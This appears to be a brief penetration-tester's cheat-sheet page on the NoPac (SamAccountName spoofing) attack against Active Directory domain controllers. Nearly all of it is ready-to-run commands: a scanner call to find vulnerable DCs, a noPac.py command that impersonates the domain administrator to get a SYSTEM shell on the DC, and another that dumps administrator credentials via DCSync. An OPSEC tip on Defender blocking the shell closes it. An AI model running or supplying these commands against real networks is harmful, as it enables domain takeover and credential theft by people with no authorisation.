🥸

NoPac (SamAccountName Spoofing)

Tags
LocalAuthenticatedLateral MovementPrivilege EscalationDomain Admin

Embed GitHubEmbed GitHub

Identify

sudo python3 scanner.py domain.local/user:'password' -dc-ip <DCIP> -use-ldap

Exploit

sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <dcip>  -dc-host DC01 -shell --impersonate administrator -use-ldap
get SYSTEM shell on DC
sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <dcip>  -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN/administrator
noPAC to DCSync
💡

OPSEC: will spawn a SYSTEM shell with smbsexec - shell may establish but defender will likely block further execution.